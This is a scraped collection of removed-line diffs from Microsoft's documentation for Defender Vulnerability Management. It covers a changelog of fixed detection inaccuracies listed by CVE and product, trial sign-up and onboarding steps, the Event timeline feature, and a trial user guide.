-| - | Added Microsoft Defender Vulnerability Management support to Jetbrains Teamcity | 22-Oct-23 |
-| 36144 | Fixed inaccuracy in CVE-2023-3935 | 23-Oct-23 |
-| 32979 | Fixed inaccuracy in Bloomberg | 25-Oct-23 |
-| - | Fixed inaccuracy in Curl normalization | 25-Oct-23 |
-| - | Fixed inaccuracy in Progress - WS FTP Server | 25-Oct-23 |
-| - | Added Microsoft Defender Vulnerability Management support to SQL server 2022 | 26-Oct-23 |
-| - | Added accurate End of Life details for Flash Player | 30-Oct-23 |
-| 32020 | Fixed inaccuracy in Fiddler Everywhere | 30-Oct-23 |
-| 35189 |Fixed inaccuracy in OpenSSL for Magnet Forensics | 30-Oct-23 |
-| 31139 | Fixed inaccuracy in CVE-2023-3935 | 31-Oct-23 |
-| - | Fixed inaccuracy in CVE-2023-31102 | 31-Oct-23 |
-| - | Fixed inaccuracy in CVE-2022-43946 | 31-Oct-23 |
-| 33380 | Fixed inaccuracy in CVE-2023-32558 | 31-Oct-23 |
-| - | Fixed inaccuracy in CVE-2014-5455 | 31-Oct-23 |
-
-## September 2023
-
-| Inaccuracy report ID | Description | Fix date |
-||||
-| - |Added accurate EOS details for Redis| 04-Sep-23 |
-| 31688 |Fixed inaccuracy in CVE-2023-38831 and CVE-2023-40477| 05-Sep-23 |
-| 31898 |Fixed Inaccuracy in CVE-2023-4373| 05-Sep-23 |
-| 30809 |Fixed inaccuracy in FireEye path of OpenSSL| 05-Sep-23 |
-| 31651 |Microsoft Defender Vulnerability Management doesn't currently support </br> CVE-2022-0778| 12-Sep-23 |
-| 31590 |Fixed inaccuracy in Dell Command Update| 12-Sep-23 |
-| 30966 |Microsoft Defender Vulnerability Management doesn't currently support </br> Lenovo ThinkPad models: X1 Yoga 3rd Gen and X13 3rd Gen| 12-Sep-23 |
-| 29892 |Microsoft Defender Vulnerability Management doesn't currently support OpenBSI| 12-Sep-23 |
-| 29634 |Fixed inaccuracy in CVE-2019-14568| 13-Sep-23 |
-| - |Microsoft Defender Vulnerability Management doesn't currently support </br> IBM Business Process Monitor| 12-Sep-23 |
-| 27242 |Fixed inaccuracy in Forticlient| 13-Sep-23 |
-| 30770 |Fixed inaccuracy in MySQL WorkBench| 13-Sep-23 |
-| 32471 |Fixed inaccuracy in CVE-2023-40481| 19-Sep-23 |
-| 32114 |Microsoft Defender Vulnerability Management doesn't currently support</br> MitsubishiElectric GX Works3| 19-Sep-23 |
-| 30581 |Fixed inaccuracy in CVE-2022-35909| 21-Sep-23 |
-| - |Fixed Inaccuracy in Cisco Secure Client| 21-Sep-23 |
-
-## August 2023
-
-| Inaccuracy report ID | Description | Fix date |
-||||
-| - |Fixed inaccuracy in Acrobat Reader DC| 02-Aug-23 |
-| 29672 |Fixed inaccuracy in RedHat Kernel Devel and CentOS Kernel Devel| 03-Aug-23 |
-| - |Fixed inaccuracy in NetScaler Gateway Plugin| 03-Aug-23 |
-| - |Added Microsoft Defender Vulnerability Management support for Azul products| 09-Aug-23 |
-| 30082 |Fixed inaccuracy in CVE-2022-43946| 09-Aug-23 |
-| - |Added accurate EOS details for Outlook (2010 & 2013) and Office build versions: </br> (2304,2305,1902,1908,2008,2202)| 10-Aug-23 |
-| 30002 |Fixed inaccuracy in KeePass versions| 10-Aug-23 |
-| - |Added Microsoft Defender Vulnerability Management support to ODBC and OLEDB| 10-Aug-23 |
-| 29552 |Fixed inaccuracy in Dell Command Update| 14-Aug-23 |
-| - |Fixed inaccuracy in CVE-2021-36234| 22-Aug-23 |
-| - |Fixed inaccuracy in CVE-2021-36283| 22-Aug-23 |
-| 30303 | Microsoft Defender Vulnerability Management doesn't currently support </br> Lenovo ThinkPad models: E15-gen 4, L13, L490, T490, T490s, and T470s| 29-Aug-23 |
-| 29397 | Fixed inaccuracy in Microsoft PowerShell| 29-Aug-23 |
-| 31279 | Fixed inaccuracy in Azul Zulu| 29-Aug-23 |
-| - |Fixed inaccuracy in CVE-2021-36324| 30-Aug-23 |
-
-## July 2023
-
-| Inaccuracy report ID | Description | Fix date |
-||||
-| 24162 |Fixed inaccuracy in MYSQL Workbench| 04-Jul-23|
-| 25736 | Fixed inaccuracy in KeePass | 04-Jul-23|
-| 24598 | Fixed inaccuracy in Adobe Flash Player plugins |04-Jul-23|
-| - |Lenovo CVEs not currently supported by Defender Vulnerability Management: </br> CVE-2021-3519, CVE-2021-22499, CVE-2021-22500, CVE-2021-22514| 03-Jul-23|
-| - |Added Microsoft Defender Vulnerability Management support for Arcserve UDP | 05-Jul-23|
-| - |Added accurate EOS details for Log 4j versions| 05-Jul-23|
-| 27379 | Fixed inaccuracy in Adobe Animate | 06-Jul-23|
-| - |Added Arcserve UDP affected product details in CVE-2023-26258 |05-Jul-23|
-| 26391 | Fixed inaccuracy in CVE-2020-26941 | 09-Jul-23|
-| 25245 | Fixed inaccuracy in CVE-2022-40011 | 11-Jul-23|
-| - |Added Defender Vulnerability Management support for </br> Microsoft PowerBI Desktop | 13-Jul-23|
-| - |Added zero-day details for CVE-2023-36884 | 12-Jul-23|
-| 26421 |Defender Vulnerability Management doesn't currently support: </br> ThinkCentre M75q Gen 2 & ThinkPad l390 Firmware| 14-Jul-23|
-| 23876 |Fixed inaccurate recommendation in Microsoft Teams CVE-2023-24881 | 20-Jul-23|
-| 25969 |Fixed inaccuracy in Siemens Sinec NMS | 24-Jul-23|
-| - |Added EOS details for Windows Server 2012 & Windows Server 2012 R2 | 25-Jul-23|
-| 29096 | Fixed inaccurate detection of Slack version 1.0.0.0 | 25-Jul-23|
-| 27941 | Defender Vulnerability Management doesn't currently support </br> Application Performance Management| 25-Jul-23|
-| 26116 | Fixed inaccuracy in HP CVEs: </br> CVE-2021-33159, CVE-2022-26845, CVE-2022-27497, CVE-2022-29893 | 27-Jul-23|
-| 25809 | Defender Vulnerability Management doesn't currently support: </br> Visio 2010, 2013, 2016 & 2019 | 31-Jul-23|
-| 25810 | Defender Vulnerability Management doesn't currently support Project 2019| 31-Jul-23|
-| 28176 | Fixed inaccuracy in VMWare Tools CVE-2021-31693 | 31-Jul-23|
-| 29089 | Fixed inaccuracy in CVE-2023-24329| 31-Jul-23|
-| 28489 | Fixed inaccuracy in CVE-2020-9484 | 31-Jul-23|
-| 28385 | Fixed inaccuracy in CVE-2023-28759| 31-Jul-23|
-
-## June 2023
-
-| Inaccuracy report ID | Description | Fix date |
-||||
-| 24147 | Fixed inaccuracy in CVE-2023-29338 | 5-Jun-23 |
-| 24145 | Fixed inaccurate detections in product - dbeaver | 06-Jun-23 |
-| 23877 | Disabled Defender Vulnerability Management assessment for oracle_ bpftool | 06-Jun-23 |
-| 24620 | Disabled Defender Vulnerability Management for synology_chat | 12-Jun-23 |
-| 25091 | Updated inaccurate EOS date for oracle_jdk version 7 | 15-Jun-23 |
-| 23425 | Fixed inaccurate detections in mongodb & mongosh | 21-Jun-23 |
-| 23188 | Fixed inaccurate detections in oracle: vm_virtualbox & vm_virtualbox_guest_additions | 21-Jun-23 |
-| 25559 | Fixed inaccuracy in Halo version -1.0.0.0 | 22-Jun-23 |
-| 25762 | Fixed inaccuracy in CVE-2022-48435 | 28-Jun-23 |
-| 25639 | Fixed inaccurate file path detections in apache_commonsText | 28-Jun-23 |
-| 26367 | Fixed inaccurate file path detections in Winrar | 28-Jun-23 |
-| 27146 | Fixed inaccuracy in Windows 2012 r2 - KB5012170 | 28-Jun-23 |
-| 22866 | Fixed normalization issue in dell optiplex_7470_ firmware | 29-Jun-23 |
security Get Defender Vulnerability Management https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-vulnerability-management/get-defender-vulnerability-management.md
- Title: Sign up for Microsoft Defender Vulnerability Management
-description: Get Microsoft Defender Vulnerability Management
-------- m365-security-- tier1-- essentials-get-started Previously updated : 08/01/2023--
-# Sign up for Microsoft Defender Vulnerability Management
-
-Microsoft Defender Vulnerability Management is available as a standalone and as an add-on for Microsoft Defender for Endpoint Plan 2 customers.
-
-> [!NOTE]
-> The trial offering for Microsoft Defender Vulnerability Management isn't currently available to:
->
-> - US Government customers using GCC High, and DoD
-> - Microsoft Defender for Business customers
---- If you're a new customer or an existing Defender for Endpoint P1 or Microsoft 365 E3 customer sign up to try the [Defender Vulnerability Management Standalone Trial](#try-defender-vulnerability-management-standalone)-- If you already have Defender for Endpoint Plan 2, sign up to try the [Defender Vulnerability Management Add-on Trial](#try-defender-vulnerability-management-add-on-trial-for-defender-for-endpoint-plan-2-customers)-
-> [!NOTE]
-> Trials will be available to customers using the New Commerce Experience (NCE) for a 30 day period. After the 30 day period customers will be able to purchase Microsoft Defender Vulnerability Management through NCE.
-
-## Required roles for starting the trial
-
-2. As a Global Administrator, you can start the trial or you can allow to users start the trial on behalf of your organization by enabling this option:
-
- 1. In the Microsoft 365 admin center, go to **Settings** > **Org settings** > **Services** > **User owned apps and services**
- 2. Check **Let users start trials on behalf of your organization**
- 3. Select **Save**
--
-> [!NOTE]
-> If you don't want users in your organization to be able to start trials, as a Global Administrator you must disable this option once you've activated the trial.
->
-> Only a Global Administrator can end the trial.
-
-It can take a few hours for the changes to take effect. Once it does, return to the trial setup page and select **Begin trial**.
-
-## Try Defender Vulnerability Management Standalone
-
-If you're a new customer or an existing Defender for Endpoint P1 or Microsoft 365 E3 customer, you will sign up to trial the **Defender Vulnerability Management Standalone trial**.
-
-> [!IMPORTANT]
-> You must be logged into the tenant as a global administrator to perform this task.
-
-To sign up:
-
-1. Log in as a global admin to the tenant where the Defender Vulnerability Management Standalone trial service will be added.
-2. Visit [Microsoft Defender Vulnerability Management Trial](https://aka.ms/MdvmStandaloneStartTrial).
-3. Follow the prompts to sign in. This will differ depending on whether you already have a Microsoft 365 subscription or not.
-4. Once you have signed in, select the **Try now** button to confirm your order of the 90 day subscription of the Defender Vulnerability Management Standalone trial.
-5. Select **Continue**. You'll now be directed to the Microsoft Defender portal.
-
-> [!NOTE]
-> Once you activate the trial it can take up to 4 hours for Defender Vulnerability Management to be fully available in your tenant.
-
-## Try Defender Vulnerability Management Add-on trial for Defender for Endpoint Plan 2 customers
-
-If you already have Defender for Endpoint Plan 2, sign up to the **Defender Vulnerability Management Add-on trial** to get access to the additional capabilities. To sign up:
-
-1. Visit [Microsoft Defender Vulnerability Management Add-on Trial](https://aka.ms/MdvmAddonStartTrial).
-2. Follow the prompts to sign in. This will differ depending on whether you already have a Microsoft 365 subscription or not.
-3. Once you have signed in, select the **Try now** button to confirm your order of the 90 day subscription of the Microsoft Defender Vulnerability Add-on trial.
-4. Select **Continue**. You'll now be directed to the Microsoft Defender portal.
-
-> [!NOTE]
-> Once you activate the trial it can take up to 6 hours for the new features to become available in the portal.
-
-## Next steps
--- When you're ready to get started, visit the Microsoft Defender portal ([https://security.microsoft.com](https://security.microsoft.com)) to start using Defender Vulnerability Management.-- [Learn more about Defender Vulnerability Management](defender-vulnerability-management.md).
security Mdvm Onboard Devices https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-vulnerability-management/mdvm-onboard-devices.md
- Title: Onboard to Microsoft Defender Vulnerability Management
-description: Learn how to onboard endpoints to Microsoft Defender Vulnerability Management service
------ m365-security-- tier1-- essentials-manage-- essentials-get-started-- Previously updated : 08/01/2023--
-# Onboard to Microsoft Defender Vulnerability Management
-
-**Applies to:**
--- [Microsoft Defender Vulnerability Management](https://go.microsoft.com/fwlink/?linkid=2229011)-- [Microsoft Defender XDR](https://go.microsoft.com/fwlink/?linkid=2118804)-- [Microsoft Defender for Servers Plan 2](/azure/defender-for-cloud/plan-defender-for-servers-select-plan)-
-To onboard devices to Defender Vulnerability Management you follow the same steps as you would for onboarding devices to Microsoft Defender for Endpoint.
-
-Use this article for guidance on how to onboard devices to Defender Vulnerability Management.
-
-> [!TIP]
-> Did you know you can try all the features in Microsoft Defender Vulnerability Management for free? Find out how to [sign up for a free trial](../defender-vulnerability-management/defender-vulnerability-management-trial.md).
-
-## Onboard devices using any of the supported management tools
-
-To onboard device to Defender Vulnerability Management you'll need to go the onboarding section of the Microsoft Defender portal. Depending on the operating system, you'll be guided on the appropriate steps and the management and deployment tool options available.
-
-This video provides a quick overview of the onboarding process and the different tools and methods.
-
-> [!VIDEO https://www.microsoft.com/videoplayer/embed/RE4bGqr]
-
-To start onboarding your devices to Defender Vulnerability Management:
-
-1. Go to the Onboarding section in the [Microsoft Defender portal](https://security.microsoft.com/securitysettings/endpoints/onboarding).
-2. Choose the operating system for the devices you wish to onboard.
-3. Select the Deployment method you plan to use.
-4. Follow the instructions to onboard your devices.
-
-For more information and steps on how to onboard your devices using the different deployment tools, see [Select deployment method](../defender-endpoint/deployment-strategy.md#step-2-select-deployment-method).
-
-## Offboard devices
-
-To offboard device from Defender Vulnerability Management you'll need to go the offboarding section of the [Microsoft Defender portal](https://security.microsoft.com/securitysettings/endpoints/offboarding).
-
-For more information on how to offboard your devices, see [offboard devices](../defender-endpoint/offboard-machines.md).
-
security Threat And Vuln Mgt Event Timeline https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-vulnerability-management/threat-and-vuln-mgt-event-timeline.md
- Title: Event timeline
-description: Event timeline is a risk news feed that helps you interpret how risk is introduced into the organization, and which mitigations happened to reduce it.
------- m365-security-- Tier1- Previously updated : 03/04/2022--
-# Event timeline
--
-**Applies to:**
--- [Microsoft Defender Vulnerability Management](https://go.microsoft.com/fwlink/?linkid=2229011)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/?linkid=2154037)-- [Microsoft Defender XDR](https://go.microsoft.com/fwlink/?linkid=2118804)-- [Microsoft Defender for Servers Plan 1 & 2](/azure/defender-for-cloud/plan-defender-for-servers-select-plan)-
-Event timeline is a risk news feed that helps you interpret how risk is introduced into the organization through new vulnerabilities or exploits. You can view events that may impact your organization's risk. For example, you can find new vulnerabilities that were introduced, vulnerabilities that became exploitable, exploit that was added to an exploit kit, and more.
-
-Event timeline also tells the story of your [exposure score](tvm-exposure-score.md) and [Microsoft Secure Score for Devices](tvm-microsoft-secure-score-devices.md) so you can determine the cause of large changes. Events can impact your devices or your score for devices. Reduce you exposure by addressing what needs to be remediated based on the prioritized [security recommendations](tvm-security-recommendation.md).
-
-> [!TIP]
-> Did you know you can try all the features in Microsoft Defender Vulnerability Management for free? Find out how to [sign up for a free trial](../defender-vulnerability-management/defender-vulnerability-management-trial.md).
-
-## Navigate to the Event timeline page
-
-There are three entry points from the [Microsoft Defender Vulnerability Management dashboard](tvm-dashboard-insights.md):
--- **Organization exposure score card**: Hover over the event dots in the "Exposure Score over time" graph and select "See all events from this day." The events represent software vulnerabilities.-- **Microsoft Secure Score for Devices**: Hover over the event dots in the "Your score for devices over time" graph and select "See all events from this day." The events represent new configuration assessments.-- **Top events card**: Select "Show more" at the bottom of the top events table. The card displays the three most impactful events in the last 7 days. Impactful events can include if the event affects a large number of devices, or if it is a critical vulnerability.-
-### Exposure score and Microsoft Secure Score for Devices graphs
-
-In the Defender Vulnerability Management dashboard, hover over the Exposure score graph to view top software vulnerability events from that day that impacted your devices. Hover over the Microsoft Secure Score for Devices graph to view new security configuration assessments that affect your score.
-
-If there are no events that affect your devices or your score for devices, then none will be shown.
-
-![Exposure score hover.](../../media/defender-vulnerability-management/tvm-event-timeline-device-hover360.png)
-![Microsoft Secure Score for Devices hover.](../../media/defender-vulnerability-management/tvm-event-timeline-device-hover360.png)
-
-### Drill down to events from that day
-
-Selecting **Show all events from this day** takes you to the Event timeline page with a custom date range for that day.
-
-![Event timeline selected custom date range.](../../media/defender-vulnerability-management/tvm-event-timeline-drilldown.png)
-
-Select **Custom range** to change the date range to another custom one, or a pre-set time range.
-
-![Event timeline date range options.](../../media/defender-vulnerability-management/tvm-event-timeline-dates.png)
-
-## Event timeline overview
-
-On the Event timeline page, you can view the all the necessary info related to an event.
-
-Features:
--- Customize columns-- Filter by event type or percent of impacted devices-- View 30, 50, or 100 items per page-
-The two large numbers at the top of the page show the number of new vulnerabilities and exploitable vulnerabilities, not events. Some events can have multiple vulnerabilities, and some vulnerabilities can have multiple events.
-
-![Event timeline page.](../../media/defender-vulnerability-management/tvm-event-timeline-overview-mixed-type.png)
-
-### Columns
--- **Date**: month, day, year-- **Event**: impactful event, including component, type, and number of impacted devices-- **Related component**: software-- **Originally impacted devices**: the number, and percentage, of impacted devices when this event originally occurred. You can also filter by the percent of originally impacted devices, out of your total number of devices.-- **Currently impacted devices**: the current number, and percentage, of devices that this event currently impacts. You can find this field by selecting **Customize columns**.-- **Types**: reflect time-stamped events that impact the score. They can be filtered.
- - Exploit added to an exploit kit
- - Exploit was verified
- - New public exploit
- - New vulnerability
- - New configuration assessment
-- **Score trend**: exposure score trend-
-### Icons
-
-The following icons show up next to events:
--- ![bug icon.](../../media/defender-vulnerability-management/tvm-black-bug-icon.png) New public exploit-- ![report warning icon.](../../media/defender-vulnerability-management/report-warning-icon.png) New vulnerability was published-- ![exploit kit.](../../media/defender-vulnerability-management/bug-lightning-icon2.png) Exploit found in exploit kit-- ![bug icon with warning icon.](../../media/defender-vulnerability-management/bug-caution-icon2.png) Exploit verified-
-### Drill down to a specific event
-
-Once you select an event, a flyout will appear with a list of the details and current CVEs that affect your devices. You can show more CVEs or view the related recommendation.
-
-The arrow below "score trend" helps you determine whether this event potentially raised or lowered your organizational exposure score. Higher exposure score means devices are more vulnerable to exploitation.
-
-![Event timeline flyout.](../../media/defender-vulnerability-management/tvm-event-timeline-flyout500.png)
-
-From there, select **Go to related security recommendation** view the recommendation that addresses the new software vulnerability in the [security recommendations page](tvm-security-recommendation.md). After reading the description and vulnerability details in the security recommendation, you can submit a remediation request, and track the request in the [remediation page](tvm-remediation.md).
-
-## View Event timelines in software pages
-
-To open a software page, select an event > select the hyperlinked software name (like Visual Studio 2017) in the section called "Related component" in the flyout. [Learn more about software pages](tvm-software-inventory.md#software-pages)
-
-A full page will appear with all the details of a specific software. Mouse over the graph to see the timeline of events for that specific software.
-
-![Software page with an Event timeline graph.](../../media/defender-vulnerability-management/tvm-event-timeline-software2.png)
-
-Navigate to the event timeline tab to view all the events related to that software. You can also see security recommendations, discovered vulnerabilities, installed devices, and version distribution.
-
-![Software page with an Event timeline tab.](../../media/defender-vulnerability-management/tvm-event-timeline-software-pages.png)
-
-## Related topics
--- [Dashboard](tvm-dashboard-insights.md)-- [Exposure score](tvm-exposure-score.md)-- [Security recommendations](tvm-security-recommendation.md)-- [Remediate vulnerabilities](tvm-remediation.md)-- [Software inventory](tvm-software-inventory.md)
security Trial User Guide Defender Vulnerability Management https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-vulnerability-management/trial-user-guide-defender-vulnerability-management.md
- Title: Trial user guide - Microsoft Defender Vulnerability Management
-description: Learn how Microsoft Defender Vulnerability Management can help you protect all your users and data.
------- m365-security-compliance-- tier1-- essentials-get-started-- Previously updated : 03/15/2024--
-# Trial user guide: Microsoft Defender Vulnerability Management
-
-This user guide is a simple tool to help you setup and make the most of your free Microsoft Defender Vulnerability Management trial. Using the suggested steps in this guide from the Microsoft Security team, you'll learn how vulnerability management can help you protect your users and data.
-
-> [!NOTE]
-> The trial offering for Microsoft Defender Vulnerability Management isn't currently available to:
->
-> - US Government customers using GCC High, and DoD
-> - Microsoft Defender for Business customers
--
-## What is Microsoft Defender Vulnerability Management?
-
-Reducing cyber risk requires a comprehensive risk-based vulnerability management program to identify, assess, remediate, and track important vulnerabilities across your most critical assets.
-
-Microsoft Defender Vulnerability Management delivers asset visibility, continuous real-time discovery and assessment of vulnerabilities, context-aware threat & business prioritization, and built-in remediation processes. It includes capabilities so your teams can intelligently assess, prioritize, and seamlessly remediate the biggest risks to your organization.
--
-Watch the following video to learn more about Defender Vulnerability Management:
-
-> [!VIDEO https://www.microsoft.com/videoplayer/embed/RE4Y1FX]
-
-## Let's get started
-
-### Step 1: Set-up
-
-> [!NOTE]
-> Users need to have the global admin role defined in Microsoft Entra ID to onboard the trial. For more information, see [Required roles for starting the trial](get-defender-vulnerability-management.md#required-roles-for-starting-the-trial).
-
-1. Check [permissions and pre-requisites.](tvm-prerequisites.md)
-2. The Microsoft Defender Vulnerability Management trial can be accessed in several ways:
-
- - If you have access to the [Microsoft Defender 365 portal](https://security.microsoft.com/trialHorizontalHub), go to **Trials** in the left navigation pane bar. Once you've reached the [Microsoft 365 trials hub](https://security.microsoft.com/trialHorizontalHub):
-
- - If you have Defender for Endpoint Plan 2, find the **Defender Vulnerability Management add-on** card and select **Try now**.
- - If you're a new customer or an existing Defender for Endpoint P1 or Microsoft 365 E3 customer, choose the **Defender Vulnerability Management** card and select **Try now**.
-
- :::image type="content" source="../../medivm-trialshub.png" alt-text="Screenshot of Microsoft Defender Vulnerability Management trial hub landing page.":::
-
- - Sign up through the [Microsoft Admin Center](https://admin.microsoft.com/#/catalog) (global admins only).
-
-> [!NOTE]
-> For more options on how to sign up to the trial, see [Sign up for Microsoft Defender Vulnerability Management](get-defender-vulnerability-management.md).
-
-3. Review the information about what's included in the trial, then select **Begin trial**. Once you activate the trial it can take up to 6 hours for the new features to become available in the portal.
-
- - The Defender Vulnerability Management add-on trial lasts for 90 days.
- - The Defender Vulnerability Management Standalone trial lasts for 90 days.
-
-4. When you're ready to get started, visit the [Microsoft Defender portal](https://security.microsoft.com) and select **Vulnerability management** in the left navigation bar to start using the Defender Vulnerability Management trial.
-
-> [!NOTE]
-> If you're a Microsoft Defender for Cloud customers, see [Vulnerability Management capabilities for servers](./defender-vulnerability-management-capabilities.md#vulnerability-management-capabilities-for-servers) to learn more about the Defender Vulnerabilities Management capabilities available to your organization.
-
-## Try out Defender Vulnerability Management
-
-### Step 1: Know what to protect in a single view
-
-Built-in and agentless scanners continuously monitor and detect risk even when devices aren't connected to the corporate network. Expanded asset coverage consolidates software applications, digital certificates, browser extensions, and hardware and firmware into a single inventory view.
-
-1. [**Device inventory**](../defender-endpoint/machines-view-overview.md) - The device inventory shows a list of the devices in your network. By default, the list displays devices seen in the last 30 days. At a glance, you'll see information such as domains, risk levels, OS platform, associated CVEs, and other details for easy identification of devices most at risk.
-
-2. Discover and assess your organization's software in a single, consolidated inventory view:
- - [**Software application inventory**](tvm-software-inventory.md) - the software inventory in Defender Vulnerability Management is a list of known applications in your organization. The view includes vulnerability and misconfiguration insights across installed software with prioritized impact scores and details such as OS platforms, vendors, number of weaknesses, threats, and an entity-level view of exposed devices.
- - [**Browser extension assessments**](tvm-browser-extensions.md) - the browser extensions page displays a list of the extensions installed across different browsers in your organization. Extensions usually need different permissions to run properly. Defender Vulnerability Management provides detailed information on the permissions requested by each extension and identifies those with the highest associated risk levels, the devices with the extension turned on, installed versions, and more.
- - [**Certificate inventory**](tvm-certificate-inventory.md) - the certificate inventory allows you to discover, assess, and manage digital certificates installed across your organization in a single view. This can help you:
- - Identify certificates that are about to expire so you can update them and prevent service disruption.
- - Detect potential vulnerabilities due to the use of weak signature algorithm (for example, SHA-1-RSA), short key size (for example, RSA 512 bit), or weak signature hash algorithm (for example, MD5).
- - Ensure compliance with regulatory guidelines and organizational policy.
- - [**Hardware and firmware**](tvm-certificate-inventory.md) - the hardware and firmware inventory provides a list of known hardware and firmware in your organization. It provides individual inventories for system models, processors, and BIOS. Each view includes details such as the name of the vendor, number of weaknesses, threats insights, and the number of exposed devices.
-
-3. [**Authenticated scan for Windows**](windows-authenticated-scan.md) - with Authenticated scan for Windows you can remotely target by IP ranges or hostnames and scan Windows services by providing Defender Vulnerability Management with credentials to remotely access the devices. Once configured the targeted unmanaged devices will be scanned regularly for software vulnerabilities.
-
-4. [**Assign device value**](tvm-assign-device-value.md) - defining a device's value helps you differentiate between asset priorities. The device value is used to incorporate the risk appetite of an individual asset into the Defender Vulnerability Management exposure score calculation. Devices assigned as "high value" will receive more weight. Device value options:
- - Low
- - Normal (Default)
- - High
-
- You can also use the [set device value API](/microsoft-365/security/defender-endpoint/set-device-value).
-
-### Step 2: Track and mitigate remediation activities
-
-1. [**Request remediation**](tvm-remediation.md#request-remediation) - vulnerability management capabilities bridge the gap between Security and IT administrators through the remediation request workflow. Security admins like you can request for the IT Administrator to remediate a vulnerability from the **Recommendation** pages to [Intune](/mem/intune/).
-2. [**View your remediation activities**](tvm-remediation.md#view-your-remediation-activities) - when you submit a remediation request from the Security recommendations page, it kicks-off a remediation activity. A security task is created that can be tracked on a **Remediation** page, and a remediation ticket is created in Microsoft Intune.
-3. [**Block vulnerable applications**](tvm-block-vuln-apps.md) - Remediating vulnerabilities takes time and can be dependent on the responsibilities and resources of the IT team. Security admins can temporarily reduce the risk of a vulnerability by taking immediate action to block all currently known vulnerable versions of an application or warn users with customizable messages before opening vulnerable app versions until the remediation request is completed. The block option gives IT teams time to patch the application without security admins worrying that the vulnerabilities will be exploited in the meantime.
-
- - [How to block vulnerable applications](tvm-block-vuln-apps.md#how-to-block-vulnerable-applications)
- - [View remediation activities](tvm-block-vuln-apps.md#view-remediation-activities)
- - [View blocked applications](tvm-block-vuln-apps.md#view-blocked-applications)
- - [Unblock applications](tvm-block-vuln-apps.md#unblock-applications)
-
-> [!NOTE]
-> When the trial ends blocked applications will be immediately unblocked whereas baseline profiles may be stored for a short additional time before being deleted.
-
-4. Use enhanced assessment capabilities such as [Network shares analysis](tvm-network-share-assessment.md) to protect vulnerable network shares. As network shares can be easily accessed by network users, small common weaknesses can make them vulnerable. These types of misconfigurations are commonly used in the wild by attackers for lateral movement, reconnaissance, data exfiltration, and more. That's why we built a new category of configuration assessments in Defender Vulnerability Management that identify the common weaknesses that expose your endpoints to attack vectors in Windows network shares. This helps you:
- - Disallow offline access to shares
- - Remove shares from the root folder
- - Remove share write permission set to 'Everyone'
- - Set folder enumeration for shares
-
-5. View and monitor your organization's devices using a [**Vulnerable devices report**](tvm-vulnerable-devices-report.md) that shows graphs and bar charts with vulnerable device trends and current statistics. The goal is for you to understand the breath and scope of your device exposure.
-
-### Step 3: Set up security baseline assessments
-
-Instead of running point-in-time compliance scans, security baselines assessment helps you to continuously and proactively monitor your organization's compliance against industry security benchmarks in real time. A security baseline profile is a customized profile that you can create to assess and monitor endpoints in your organization against industry security benchmarks (CIS, NIST, MS). When you create a security baseline profile, you're creating a template that consists of multiple device configuration settings and a base benchmark to compare against.
-
-Security baselines provide support for Center for Internet Security (CIS) benchmarks for Windows 10, Windows 11, and Windows Server 2008 R2 and above, as well as Security Technical Implementation Guides (STIG) benchmarks for Windows 10 and Windows Server 2019.
-
-1. Get started with [security baselines assessment](tvm-security-baselines.md#get-started-with-security-baselines-assessment)
-2. Review [security baseline profile assessment results](tvm-security-baselines.md#review-security-baseline-profile-assessment-results)
-3. [Use advanced hunting](tvm-security-baselines.md#use-advanced-hunting)
-
-> [!NOTE]
-> When the trial ends security baseline profiles may be stored for a short additional time before being deleted.
-
-### Step 4: Create meaningful reports to get in-depth insights using APIs and Advanced Hunting
-
-Defender Vulnerability Management APIs can help drive clarity in your organization with customized views into your security posture and automation of vulnerability management workflows. Alleviate your security team's workload with data collection, risk score analysis, and integrations with your other organizational processes and solutions. For more information, see:
--- [Export assessment methods and properties per device](../defender-endpoint/get-assessment-methods-properties.md)-- [Defender Vulnerability Management APIs blog](https://techcommunity.microsoft.com/t5/microsoft-defender-vulnerability/new-threat-amp-vulnerability-management-apis-create-reports/ba-p/2445813)-
-Advanced hunting enables flexible access to Defender Vulnerability Management raw data, which allows you to proactively inspect entities for known and potential threats.
-For more information, see [Hunt for exposed devices](../defender-endpoint/advanced-hunting-overview.md).
-
-## Licensing and trial information
-
-As part of the trial setup, the new Defender Vulnerability Management trial licenses will be applied to users automatically. Therefore, no assignment is needed (_The trial can automatically apply up to 1,000,000 licenses_). The licenses are active for the duration of the trial.
-
-### Getting started with the trial
-
-You can start using Defender Vulnerability Management features as soon as you see them in the Microsoft Defender portal. Nothing is created automatically and users won't be affected. When you navigate to each solution, you may be guided to make extra setup configurations to start using features.
-
-### Extending the trial
-
-You can extend the trial within the last 15 days of the trial period. You're limited to a maximum of two trial periods. If you don't extend by the time your trial period ends, you'll need to wait at least 30 days before signing up for a second trial.
-
-### Ending the trial
-
-Admins can disable the trial anytime by selecting **Trials** on the left navigation, going to the **Defender Vulnerability Management** trial card and selecting **End trial**.
-
-Unless stated otherwise for the solution your trial data will be maintained for time, usually 180 days, before being permanently deleted. You may continue to access the data gathered during the trial until that time.
-
-## Additional resources
--- Terms and conditions: See the [terms and conditions](/legal/microsoft-365/microsoft-365-trial) for Microsoft 365 trials.-- Compare offerings: [Microsoft Defender Vulnerability Management](defender-vulnerability-management-capabilities.md)-- [Defender Vulnerability Management documentation](../defender-vulnerability-management/index.yml)-- Datasheet: [Microsoft Defender Vulnerability Management: Reduce cyber risk with continuous vulnerability discovery and assessment, risk-based prioritization, and remediation](https://query.prod.cms.rt.microsoft.com/cms/api/am/binary/RE4XR02)
security Tvm Assign Device Value https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-vulnerability-management/tvm-assign-device-value.md
- Title: Assign device value
-description: Learn how to assign a low, normal, or high value to a device to help you differentiate between asset priorities.
-----
- - m365-security
- - Tier1
- Previously updated : 03/04/2022--
-# Assign device value
-
-**Applies to:**
--- [Microsoft Defender Vulnerability Management](https://go.microsoft.com/fwlink/?linkid=2229011)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/?linkid=2154037)-- [Microsoft Defender XDR](https://go.microsoft.com/fwlink/?linkid=2118804)-- [Microsoft Defender for Servers Plan 1 & 2](/azure/defender-for-cloud/plan-defender-for-servers-select-plan)-
